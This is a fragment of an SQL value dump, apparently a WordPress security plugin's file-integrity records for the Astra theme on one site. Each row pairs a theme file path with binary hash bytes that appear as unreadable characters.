('ûÑÕÙMs¬½¯mç}…Q\0', 'wp-content/themes/astra/inc/assets/images/starter-content/avatar.png', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/starter-content/avatar.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'af1Ÿ[’µo«~œ ', '‡Ø›>Ö²´”$àúA‹ÿ·¯÷{“X?©ž*Ü¯`', '', 0, '?'),
('ðÌ	vb!vrÒ’úL', 'wp-content/themes/astra/inc/assets/images/starter-content/blog.svg', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/starter-content/blog.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'BêuA2ŸÓ±+oD2Z´@', '{ÒCë)Ñ»n¸Óuü¾÷“…ÊÔµˆ%;éö÷>™‚ª', '', 0, '?'),
('\0"ðâr3Â"¼UIz³', 'wp-content/themes/astra/inc/assets/images/starter-content/branding.jpg', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/starter-content/branding.jpg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '1ŠqüùÀ±|’:’¢áõ', '""Ð1\ZPÃƒ3³å¡|;œ˜éùZ *§ÕzM×3\r§ Ü', '', 0, '?'),
('_ÊrË7›„ÒMa52‚}³', 'wp-content/themes/astra/inc/assets/images/starter-content/building.svg', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/starter-content/building.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'JÍcó˜.Lå0_Êè{', '<	R¹¹æqšWó­çj"M#	‰g€«{ô#L7Z‹aÕd', '', 0, '?'),
('7f•Û)±Ñ,\Z¦*•šP', 'wp-content/themes/astra/inc/assets/images/starter-content/graphic.jpg', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/starter-content/graphic.jpg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'KOÐÂ-Ðk÷¾û8(3!M°', 'QYÅfC¯œYB9"8ZŒ¯ªr•°NÉ.ˆ|Éù	Øµ', '', 0, '?'),
('i•žë>A6ÌuMæ€š”', 'wp-content/themes/astra/inc/assets/images/starter-content/hero-img.svg', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/starter-content/hero-img.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '„>''Í(¡…Öq²”°®í', '-*P]#|ó›¦ruÖN™+¦wüwt ì=“É„ÛM', '', 0, '?'),
('T’õßàá5äzepŒRÚ^', 'wp-content/themes/astra/inc/assets/images/starter-content/logo.png', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/starter-content/logo.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'éhê†&€¢Ýë™Æ_!\\}', 'Ï‹µG’P¦4ü|ºõ<x³6ú€Ô‘ùúfù–qXW', '', 0, '?'),
('6g‰¢¤@ÉqÉ¦sý–N™', 'wp-content/themes/astra/inc/assets/images/starter-content/passionate.svg', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/starter-content/passionate.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '#¥;`t`\nDX	Ž.ý€ÚÍ', 'Um×“¡>üšK¯»“ÝÛ5¡.1èð	† ×ó)!î', '', 0, '?'),
('­  †7_îú£†ÈÑV', 'wp-content/themes/astra/inc/assets/images/starter-content/portfolio.svg', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/starter-content/portfolio.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¬p/vììjb­®veó', '-SKIÜ–ËšÄrêü''É7»\\W]L”D1rç¡ô', '', 0, '?'),
(')\\ðBàCª^Gegàk', 'wp-content/themes/astra/inc/assets/images/starter-content/professional.svg', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/starter-content/professional.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'He4NÕº¦b%¡×ÌµÄ¾', ',\Z"~âse” T‚àŸ8Ü9q®÷„ÔÈšÜâ', '', 0, '?'),
('<±sä@a`q’O§«Ú:', 'wp-content/themes/astra/inc/assets/images/starter-content/shopping-bag.svg', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/starter-content/shopping-bag.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'suÎÒ^0c6åF¯6zq', ' Ü!¨Ê–}Š\0 |fVhmFº²u29æ%ÚD‡ù1lKó', '', 0, '?'),
('ƒ)cÐˆ<K•©Í çŒ', 'wp-content/themes/astra/inc/assets/images/starter-content/support.svg', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/starter-content/support.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '.‡5ÏJÙ''¨#œs1øÎ@', '¨''ŽØŽ¢ìUÉ“Äˆ7®SªÜ:|Ôá´µ}òÈ5', '', 0, '?'),
('ƒ¨¢o½G¤Á:x>T', 'wp-content/themes/astra/inc/assets/images/starter-content/web.jpg', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/images/starter-content/web.jpg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'mÏü³†2ñ¥ÊÑ@÷z', 'ÑbAP@€cfÁüÍ9Ü½Âñ\n*{ø^µì¦Uã6¶¬¼9', '', 0, '?'),
('ßóøµ£†[,\0#Ýûƒ?', 'wp-content/themes/astra/inc/assets/js/ast-parse-svg.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/js/ast-parse-svg.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¦ú‘"ñùW›7®24£ÐÁ', 'o460ríQ~6AÇ%ª/¢¸hàÛpKlf5.g&Lßéþ', '', 0, '?'),
('•ÏíThþn¦Û7 –ä', 'wp-content/themes/astra/inc/assets/js/ast-render-svg.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/js/ast-render-svg.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\Ziv-Ÿö¼Ô–wðŠs»', '\r‰ß&‚ê<§Y0AGå>A€š_/¯#i¶":F§W¡M', '', 0, '?'),
('òn˜úÜ‹…n4-2ðÑ', 'wp-content/themes/astra/inc/assets/js/astra-admin-menu-settings.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/js/astra-admin-menu-settings.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÏŠ`w5!}Íá''V/óœX', '€Ád‰^Cn%ª[g%"8c×½Ñî9Ã%«®ê', '', 0, '?'),
('#>´újxG¾-B’òª2', 'wp-content/themes/astra/inc/assets/js/block-editor-script.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/js/block-editor-script.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '€høätðÈ2iÀC0É', '3l ¯æ¾,ëè¬Ó‘wù*mÎK¹a\rË #„Þ*¸™', '', 0, '?'),
('˜XçÈ±@4-•ˆ˜¢ßK', 'wp-content/themes/astra/inc/assets/js/column-block-compatibility.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/js/column-block-compatibility.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Þ*Í\\RR\Z™eÓ¬–VG', '\n\n·“j]*f^8ÈYÐÈ–‚;e²™ƒ×6Fvï’ü', '', 0, '?'),
('¾â{Ùçî±+Õú2ø´!+', 'wp-content/themes/astra/inc/assets/js/custom-fields-priority.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/js/custom-fields-priority.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'I''2Ï?™ƒä¹ç×«¤–­', '¶—îqÏÌU“Sà|1¨¿[\ZœÚÌëpó„¤OÃå¸', '', 0, '?'),
('¥’ÉþyÇÕ¥˜‹â„Ô¤', 'wp-content/themes/astra/inc/assets/js/customizer-preview.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/assets/js/customizer-preview.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '~ÛÒw\r°ÄŒï¦A4¾Tå', '_m%y,XŒ’c‹xnÅ+¸hf(ž= œœCF°Z', '', 0, '?'),
('v¼û¨'')rÐ\Zašš—³¸', 'wp-content/themes/astra/inc/blog/blog-config.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/blog/blog-config.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ØX–\Z+üúÌ\ZÌ4[¸õ', 'ÚÈ¶\0Øà$BríÖ%“€}\0º•\0^õŽ”Š–L—1(', '', 0, '?'),
('L†ÕÉWñêUá•(Èr', 'wp-content/themes/astra/inc/blog/blog.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/blog/blog.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ñl*I Ü;|Õë|`@', 'ÿâ%ÍV¯ñ‡[•SÍ·3<	#¾fÌiÖŒ6´N‚-ô', '', 0, '?'),
('ëX4soVô]z\0q_æ', 'wp-content/themes/astra/inc/blog/index.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/blog/index.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '5Û¢ÚÐò»gp4Ì’/x', 'ÝíPÁ!Ô¨8aKu×•”lï¦Ä•ß —”ª}\rN8', '', 0, '?'),
('1»dÔëWÀ*\r8ÎD*0', 'wp-content/themes/astra/inc/blog/single-blog.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/blog/single-blog.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¢Õ¦‹¥¥''ƒ»È”T1,', 'Gb´dH±@-S©ÑÉÿà¥ÝüÆ´}Õ~Ïô¹¾3?~', '', 0, '?'),
('*(G~è–Ýé$.!¸½', 'wp-content/themes/astra/inc/builder/class-astra-builder-loader.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/class-astra-builder-loader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ò\0…µeB‹[®ßãÔ.çd', '^åPtUýœ…\rt¡s¥®3¢y·t‰ôa\n«¾„ÓÜ%g2o', '', 0, '?'),
(']Û<¿VÚõOVºHj?ï', 'wp-content/themes/astra/inc/builder/controllers/class-astra-builder-ui-controller.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/controllers/class-astra-builder-ui-controller.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Æp!1«ŽžZ0ÂÏä', 'b¤_ÂãÂà8¾yôdä¢ØŽnËÎZ·Ø™YgÜ¢\\¹b', '', 0, '?'),
('J.§¹dŒ£Ì‹w¦aóÞ', 'wp-content/themes/astra/inc/builder/controllers/class-astra-builder-widget-controller.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/controllers/class-astra-builder-widget-controller.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '.vÀÛ3òŽþ\rF0†>1t', '¡¯¸úhž‚á­Èr7\0Ün\\ã+å¼aƒCû]¿ßÔ', '', 0, '?'),
('±f8“Øœ°\0±úaf0·D', 'wp-content/themes/astra/inc/builder/markup/class-astra-builder-footer.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/markup/class-astra-builder-footer.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'úÉÿâ/2~Ìå ßÖ*—', '{Pœ\\LmÔDY>èõ;†ø8K£9=• øÓpð¡K', '', 0, '?'),
('ÇÁŠ÷tU7±µ/€ÊÓ#ø', 'wp-content/themes/astra/inc/builder/markup/class-astra-builder-header.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/markup/class-astra-builder-header.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'L{ÅöÝ‹EÄ™.fü‡', 'å¡ÀiÉ¿Jƒì?›¤{KÁ…®	nH@pv0Bò*»ÄCó', '', 0, '?'),
('1\r€ò¸rß_ãQƒ¼Å', 'wp-content/themes/astra/inc/builder/type/base/assets/js/customizer-preview.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/base/assets/js/customizer-preview.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '{˜ï¯Ú*Ð5QPž:et', '@G]å¾¢FG$Ý4¨DÃ2_H±¤!@þ™\0<', '', 0, '?'),
('h?oø*\ZºTkQi‘â', 'wp-content/themes/astra/inc/builder/type/base/dynamic-css/button/class-astra-button-component-dynamic-css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/base/dynamic-css/button/class-astra-button-component-dynamic-css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'bÆ·½ì¥ßÄ@Ü=†x¡', ' B¦\r‰ããÖ\n‘±…Æ^“ôc×…=á\0i·4ç#ÈdÙl', '', 0, '?'),
('–6Ý\0Ë”-T¬k^š‚+', 'wp-content/themes/astra/inc/builder/type/base/dynamic-css/html/class-astra-html-component-dynamic-css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/base/dynamic-css/html/class-astra-html-component-dynamic-css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'µO à•h152QÜï\0;Á', '›‘*t•d8ˆ]Ÿ:ˆÏd°+iÚ6œ¢ì2u«[2S', '', 0, '?'),
('+áòY*ü­‹½.dù1In', 'wp-content/themes/astra/inc/builder/type/base/dynamic-css/social/class-astra-social-component-dynamic-css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/base/dynamic-css/social/class-astra-social-component-dynamic-css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '·ãGOì?üT_ŒyÁ%', 'îò£“cÝ¡TúÜ»çrørw‘“‚¸êY£ÄgsMÆ,', '', 0, '?'),
('”ÉGíÈ¸Ÿ0ú ˆ`lG', 'wp-content/themes/astra/inc/builder/type/base/dynamic-css/widget/class-astra-widget-component-dynamic-css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/base/dynamic-css/widget/class-astra-widget-component-dynamic-css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Æk°3Co®_¦<X•Q˜¸', '"p½n9à€è¯Bb‚h´ÅÎ	ûVÃ\rcrÔ„Áñ', '', 0, '?'),
('{yˆƒ%lIU5CäéÇžRŠ', 'wp-content/themes/astra/inc/builder/type/class-astra-builder-base-dynamic-css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/class-astra-builder-base-dynamic-css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‘ÔPåOÊÑõ\r“ö', '¼­>ëBbÙh‹eŽòþž|Ÿ8P çøu‘¹`0÷=', '', 0, '?'),
('ôH°7Ë VŸ[%NÞ}', 'wp-content/themes/astra/inc/builder/type/footer/above-footer/assets/js/minified/customizer-preview.min.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/above-footer/assets/js/minified/customizer-preview.min.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ø\08\0û“g	Å2è"#v@', 'žbQÓ–2ÐaÔ\0ç‘\nS¹JbÂ`CÒ#\n¸ß^8ÙBŠ', '', 0, '?'),
('f!(VÙ[½F*Ø6ÌO%ÿ»', 'wp-content/themes/astra/inc/builder/type/footer/above-footer/assets/js/unminified/customizer-preview.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/above-footer/assets/js/unminified/customizer-preview.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÞÍíú@yH¿¸g;Ý¿[Iƒ', '.UjôÅðù=yúñ+ëE†!ÞÕŒTÆß¡£ñv"ž„?¹', '', 0, '?'),
('\n >6w¥6ç©6œš2s', 'wp-content/themes/astra/inc/builder/type/footer/above-footer/class-astra-above-footer-component-loader.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/above-footer/class-astra-above-footer-component-loader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Óm\0U£ô‹O’SDn+', 'š·qVÄÑÜð&Þ•ïu¦NF9…O.ó6¥tÙßª', '', 0, '?'),
('ðêÛ¸UË5èP·Àë˜_–', 'wp-content/themes/astra/inc/builder/type/footer/above-footer/class-astra-above-footer.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/above-footer/class-astra-above-footer.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'œ\0F“û,*Õ=I¥ßœ', '‚.;2\r2zSE¸‚VtmctqZOk]Ù´ŒAì,3D]', '', 0, '?'),
('¹lôÑ,L­7ýdA¤X]¤', 'wp-content/themes/astra/inc/builder/type/footer/above-footer/dynamic-css/dynamic.css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/above-footer/dynamic-css/dynamic.css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÔÔ,4¡€¸ÓèïoF8‘è', 'S×ö»PtÆú`³ÚR(´9<In\nÏœ%H{[}<fŽ', '', 0, '?'),
('ÓmÄé/˜>úºo˜¼o', 'wp-content/themes/astra/inc/builder/type/footer/below-footer/assets/js/minified/customizer-preview.min.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/below-footer/assets/js/minified/customizer-preview.min.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '9SˆQTEË³˜¨íc', '3’±pLUÒA®GìÉŒMM™ÔÜs¨…Ô+|ð‡Ôyº×', '', 0, '?'),
('“ƒ›×PI''‹Ã‹´é', 'wp-content/themes/astra/inc/builder/type/footer/below-footer/assets/js/unminified/customizer-preview.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/below-footer/assets/js/unminified/customizer-preview.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 's’ÐXŠµ@F¢\\xb', '¼£k½ºt²èFq(>+PTíÇ¼Ê¡''`e\02Àæ±Û', '', 0, '?'),
('Çƒ57Ÿ¯Œ+Å‰úÓ', 'wp-content/themes/astra/inc/builder/type/footer/below-footer/class-astra-below-footer-component-loader.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/below-footer/class-astra-below-footer-component-loader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '^üÂ¯lR·àC„Šëš=', 'îˆÐƒgB86P&—D¾^ê²*×ÀéÖ2ÓÀÇ’', '', 0, '?'),
('h<¥“‘ÔÄós¯/s›', 'wp-content/themes/astra/inc/builder/type/footer/below-footer/class-astra-below-footer.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/below-footer/class-astra-below-footer.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '(“˜ìG³}$''>æ×8<·', '½tsÇˆÕñÆ†hXB™Í`0ÕØ!œGÚà', '', 0, '?'),
('¶ïÿFÎßÖ«	¿jpÅ;Èv', 'wp-content/themes/astra/inc/builder/type/footer/below-footer/dynamic-css/dynamic.css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/below-footer/dynamic-css/dynamic.css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '“+(½Óæ+BØÉd\0æñ', 'MÍ}«ØÎ†TAôA1ÒÜ{Cé\Z>»Ì8À›z‰k»_û', '', 0, '?'),
('Ç†üMþ@ÓÑdó°Y¦R', 'wp-content/themes/astra/inc/builder/type/footer/button/assets/js/minified/customizer-preview.min.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/button/assets/js/minified/customizer-preview.min.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¿ÀUL\nwio8¼åfÄvŸ', 'ôÑU_½ÛŽ3p¬…»}\ri.ùMÉCº£—ss”', '', 0, '?'),
('wÓ·–&M+¿‘òß­<pN', 'wp-content/themes/astra/inc/builder/type/footer/button/assets/js/unminified/customizer-preview.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/button/assets/js/unminified/customizer-preview.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ÿ±ÔË¸ÿéö–›Ÿº]#', 'ÎÅöè²ô+‰à:D!Î`»-p‰9¥!>pYa„R', '', 0, '?'),
('IÔ?$çÕ¼eÀGŸf ü', 'wp-content/themes/astra/inc/builder/type/footer/button/class-astra-footer-button-component-loader.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/button/class-astra-footer-button-component-loader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'kJÝ¾ÇÏH¼¯I/¸RN`ï', 'œÅGí%ngMÔL%IŠE¿Ü¼fŒ&´¸‹^ˆÛéZÀ•«', '', 0, '?'),
('ŸîBáÝ×ÁVvÝ({cÂ', 'wp-content/themes/astra/inc/builder/type/footer/button/class-astra-footer-button-component.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/button/class-astra-footer-button-component.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '%1ˆlÖIó˜”Ñ:NßxD', '‚\rkB\rž	dÚ[ôjiÎO;\r#àràíd\n[eO', '', 0, '?'),
('˜ÜŽæ~\noH|ÌÜ*WS', 'wp-content/themes/astra/inc/builder/type/footer/button/dynamic-css/dynamic.css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/button/dynamic-css/dynamic.css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ªø@ª¤‘Ðró.«™À²zÏ', 'Ðå	/Ö!Ü§˜Hõö»r\n™Í;r¸ÛûÚ%^êÃž', '', 0, '?'),
('e·}êo+kg²}ÜÓG', 'wp-content/themes/astra/inc/builder/type/footer/copyright/assets/js/minified/customizer-preview.min.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/copyright/assets/js/minified/customizer-preview.min.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '+¸6-$ËÎ(5Î\\‰', '<`IÖïö¿€òn,žÜP–^êº=ÔV§g±Ñ:§j±', '', 0, '?'),
('Ïüì\ZÝ‘³ÆÇpwÆÐ', 'wp-content/themes/astra/inc/builder/type/footer/copyright/assets/js/unminified/customizer-preview.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/copyright/assets/js/unminified/customizer-preview.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'eÊÄÿ½°1ª6lªÊpQ2', 'U4Wí $5šô³-$C*£|ç×üÝhŽÈ(Ïþžm', '', 0, '?'),
('´ÃÔÓÞz¥@eM$\0', 'wp-content/themes/astra/inc/builder/type/footer/copyright/class-astra-footer-copyright-component-loader.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/copyright/class-astra-footer-copyright-component-loader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'c¡è¡v}gSh‰{îãY»¿', 'oy´HÆŠP(÷Àj@™€+Ìßþ\n±6=R\0^Ô´', '', 0, '?'),
('}c\\ì¸1DÛ/R*–,ˆ', 'wp-content/themes/astra/inc/builder/type/footer/copyright/class-astra-footer-copyright-component.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/copyright/class-astra-footer-copyright-component.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ûQd¬N€™åŒw_j', '£ë3`	î›2ƒýù|Ü×Ú?©ä-*+‹Í® ¨', '', 0, '?'),
('ã¥ëvi"ÏñPïuQÞ¡<', 'wp-content/themes/astra/inc/builder/type/footer/copyright/dynamic-css/dynamic.css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/copyright/dynamic-css/dynamic.css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Fdæk`#äpÝœ\ZºÕØÙ', 'ÑÞï®J^?NRŒfXXš¥ì“A1cï}\rÄþûj{±\n', '', 0, '?'),
(' u''& VNñ¿—uÑÅÇú', 'wp-content/themes/astra/inc/builder/type/footer/html/assets/js/minified/customizer-preview.min.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/html/assets/js/minified/customizer-preview.min.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ù¹bš¡WÏ*?3–=¼‘', '0)D7¹Wƒ–jPGÚà$•N8ð¢›…7<LMh_÷', '', 0, '?'),
('íÈOvråNã=‡5mp9š', 'wp-content/themes/astra/inc/builder/type/footer/html/assets/js/unminified/customizer-preview.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/html/assets/js/unminified/customizer-preview.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'h:›¡7rg9þ]’A4', 'œ„zMþm¦Úz+I\0`”…é1Ì;ÿ’†]¯©Õ ', '', 0, '?'),
('È5šÚC•…6¦Ý7¢ü`', 'wp-content/themes/astra/inc/builder/type/footer/html/class-astra-footer-html-component-loader.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/html/class-astra-footer-html-component-loader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'éa\rØÍÑZƒ¸¡©$L', 'Á@+A-O²™úËiÿ‰¡p¤ytO''3\Zo‡d¿¦åø', '', 0, '?'),
('@È3c‚$ÐÞÐ›¼›}Ñ', 'wp-content/themes/astra/inc/builder/type/footer/html/class-astra-footer-html-component.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/html/class-astra-footer-html-component.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÝBh;¿{[8ÛŽ©ghX', 'FàU|9S£D,#š+×ê«…ŠùŒf„Ý†‡üA@~', '', 0, '?'),
('¾\nh¶‚rù tô´æþ~e', 'wp-content/themes/astra/inc/builder/type/footer/html/dynamic-css/dynamic.css.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/html/dynamic-css/dynamic.css.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ï\Z\rð”å‚ãqœ+=Ì·“', 'Y}H™‚ÞÿE}kÅc5ò^æµ„ùX,ýÃFL)', '', 0, '?'),
('ã {z„Ž¯¯œÕ6*±=', 'wp-content/themes/astra/inc/builder/type/footer/menu/assets/js/minified/customizer-preview.min.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/menu/assets/js/minified/customizer-preview.min.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ç$¤H·üL\0ŒÌ‹Z:\n*', 'c¯GùI\nöŸðû$sËÔ(¾í»ÂúÑt¿=*Ì8¯Çy', '', 0, '?'),
('­,$L!ÒÉÌ1ÎúÚ¶0', 'wp-content/themes/astra/inc/builder/type/footer/menu/assets/js/unminified/customizer-preview.js', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/menu/assets/js/unminified/customizer-preview.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¶§a›2DµžND\0šoÚ®', '×þO6ºi_Ä_ŒîŠÿÅ;)bµ÷$°Y9£·žc', '', 0, '?'),
('{7Ÿ4Sˆm¨ŽÏìßž¶', 'wp-content/themes/astra/inc/builder/type/footer/menu/class-astra-footer-menu-component-loader.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/menu/class-astra-footer-menu-component-loader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '§ÔÎkêžÿ‡	[Ÿ×õ', '€v~ ú÷´hBïúø§¤€ÿ™.Mn@û''<úò0ü', '', 0, '?'),
('ÿ\rSáwMWIírþÃ«“ªÎ', 'wp-content/themes/astra/inc/builder/type/footer/menu/class-astra-footer-menu-component.php', '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/footer/menu/class-astra-footer-menu-component.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ùê$NÒ‘PÁHNÅ´h[½è', '`:ŒðŸKGiž+ÒDèC×˜µë0Úš$9m§<ž', '', 0, '?'),
